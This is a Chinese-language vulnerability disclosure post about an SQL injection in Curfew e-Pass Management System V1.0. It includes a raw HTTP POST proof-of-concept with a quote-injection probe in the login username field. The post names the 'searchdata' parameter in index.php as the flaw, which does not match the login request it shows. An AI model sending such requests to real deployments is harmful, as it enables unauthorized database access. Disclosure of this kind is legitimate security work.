当前位置：首页 > news >正文

Curfew e-Pass 管理系统存在Sql注入漏洞附源代码

news 2026/5/19 15:25:24

免责声明：本文所涉及的信息安全技术知识仅供参考和学习之用，并不构成任何明示或暗示的保证。读者在使用本文提供的信息时，应自行判断其适用性，并承担由此产生的一切风险和责任。本文作者对于读者基于本文内容所做出的任何行为或决定不承担任何责任。在任何情况下，本文作者不对因使用本文内容而导致的任何直接、间接、特殊或后果性损失承担责任。读者在使用本文内容时应当遵守当地法律法规，并保证不违反任何相关法律法规。

1. Curfew e-Pass 管理系统简介

用该系统通过电子通行证的方式，帮助政府和相关机构实现对宵禁期间人员出行的管控和管理。用户可以通过该系统在线申请电子通行证，提供相关个人信息和出行计划，系统审核后颁发电子通行证。

2. 漏洞描述

在index.php页面上，searchdata参数在搜索函数中的使用存在严重的SQL注入漏洞，攻击者可以利用这个漏洞来执行恶意的SQL查询，从而获取未授权的数据或者破坏系统的完整性。

3. 影响版本

Curfew e-Pass 管理系统 V1.0

4. POC&EXP

注入点：searchdata

POST /employee/Admin/login.php HTTP/1.1
Host: xxx
Content-Length: 52
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: xxx
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: xxx/employee/Admin/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=6aautr8786cmf5hon5h
Connection: close
txtusername=admin'&txtpassword=1&btnlogin=

5. 漏洞代码定位

第61行的代码存在安全风险，因为用户输入的 $searchdata变量直接插入到 SQL 查询语句中，而没有进行任何限制。这种做法使恶意用户能够利用恶意 SQL 语句执行任意数据库操作，从而对系统造成严重的安全威胁。

6. 源代码获取

关注公众号“漏洞猎人”，输入“curfew”，即可获取Curfew e-Pass管理系统源代码下载地址！！！

Curfew e-Pass 管理系统存在Sql注入漏洞附源代码

1. Curfew e-Pass 管理系统简介

2. 漏洞描述

3. 影响版本

4. POC&EXP

5. 漏洞代码定位

6. 源代码获取

相关文章：

Curfew e-Pass 管理系统存在Sql注入漏洞附源代码

记阿里云mysql丢表丢数据的实践记录

自然语言转SQL的应用场景探索

Python学习笔记——PySide6设计GUI应用之UI与逻辑分离

【智能家居入门2】（MQTT协议、微信小程序、STM32、ONENET云平台）

Java架构师之路九、设计模式：常见的设计模式，如单例模式、工厂模式、策略模式、桥接模式等

【OpenAI官方课程】第三课：ChatGPT文本总结Summarizing

跨越千年医学对话：用AI技术解锁中医古籍知识，构建能够精准问答的智能语言模型，成就专业级古籍解读助手（LLAMA）

初识表及什么是数据表

使用Docker部署DataX3.0+DataX-Web

庖丁解牛-二叉树的遍历

一文了解LM317T的引脚介绍、参数解读

【2024.02.22】定时执行专家 V7.0 发布 - TimingExecutor V7.0 Release - 龙年春节重大更新版本

☀️将大华摄像头画面接入Unity 【1】配置硬件和初始化摄像头

直流电流电压变送器4-20mA 10V信号隔离转换模拟量精度变送器

1.1 计算机网络的概念、功能、组成和分类

排序算法整理

ONLYOFFICE 桌面应用程序 v8.0 发布：全新 RTL 界面、本地主题、Moodle 集成等你期待的功能来了！

c语言---数组（超级详细）

神经网络权重初始化

Win11家庭版隐藏功能解锁：除了gpedit.msc，这些高级设置你也能用了

深入解析OpenWrt启动流程：从Bootloader到procd的完整指南

基于NVIDIA Jetson Nano的无人机边缘AI系统：从架构设计到自主跟踪实战

告别Hello World：用Scala REPL在Ubuntu上实战计算级数，附完整代码与权限避坑

解决ubuntu中hermes agent连接taotoken自定义供应商的配置问题

前端地图开发避坑指南：解决天地图、高德、百度坐标偏移的完整JS方案

VideoDownloadHelper：你的智能视频下载助手，轻松保存网页视频资源

Windows热键冲突终结者：3步精准定位占用进程的智能方案

手把手教你为YOLOv8 TensorRT推理写一个C++接口：从DLL封装到QT界面调用

cube studio开源一站式云原生机器学习平台--pytorch分布式训练